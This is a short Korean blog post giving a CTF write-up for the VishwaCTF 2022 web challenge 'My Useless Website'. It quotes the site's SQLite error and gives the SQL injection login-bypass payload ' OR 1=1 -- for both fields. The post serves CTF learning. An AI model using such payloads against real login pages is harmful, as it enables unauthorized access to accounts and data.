2022 VishwaCTF Writeup_ My Useless Webiste(Web)

2022 VishwaCTF Writeup_ My Useless Webiste(Web)

CTF_Writeup/웹 web 2022. 3. 31. 23:32
문제URL : https://my-us3l355-w3b51t3.vishwactf.com/

Admin Login

my-us3l355-w3b51t3.vishwactf.com

문제설명

I made this website having simple authentication used in it. But unfortunately I forgot the credentials. Can you help me to find the correct one ?

이 문제의 경우 SQL 삽입공격을 사용하면 간단하게 해결된다.

SQL Injection 이란? (SQL 삽입 공격) — 보안과 개발을 다 하고싶은 욕심쟁이 (tistory.com)

SQL Injection 이란? (SQL 삽입 공격)

1. SQL Injection 1.1 개요 SQL Injection SQL Injection 이란 악의적인 사용자가 보안상의 취약점을 이용하여, 임의의 SQL 문을 주입하고 실행되게 하여 데이터베이스가 비정상적인 동작을 하도록 조작

noirstar.tistory.com

Warning : SQLite3::query(): Unable to prepare statement: 1, near "or": syntax error in /opt/app-root/src/index.php on line 55 Fatal error : Uncaught Error: Call to a member function fetchArray() on bool in /opt/app-root/src/index.php:56 Stack trace: #0 {main} thrown in /opt/app-root/src/index.php on line 56

sql-injection-payload-list/Auth_Bypass.txt at master · payloadbox/sql-injection-payload-list · GitHub

GitHub - payloadbox/sql-injection-payload-list: 🎯 SQL Injection Payload List

🎯 SQL Injection Payload List. Contribute to payloadbox/sql-injection-payload-list development by creating an account on GitHub.

github.com

User: ' OR 1=1 -- Pass: ' OR 1=1 --
'CTF_Writeup > 웹 web' 카테고리의 다른 글

[ImaginaryCTF 2022] hidden, mass write up (0) 2022.07.31

2022 VishwaCTF Writeup_ Hey Buddy(Web) (0) 2022.03.31
관련글 관련글 더보기
- [ImaginaryCTF 2022] hidden, mass write up
- 2022 VishwaCTF Writeup_ Hey Buddy(Web)

ABOUT ME

GONE TO HEIP GONE TO HEIP

'CTF_Writeup > 웹 web' 카테고리의 다른 글

티스토리툴바

[ImaginaryCTF 2022] hidden, mass write up (0)	2022.07.31
2022 VishwaCTF Writeup_ Hey Buddy(Web) (0)	2022.03.31

ABOUT ME

'CTF_Writeup > 웹 web' 카테고리의 다른 글

관련글 관련글 더보기

티스토리툴바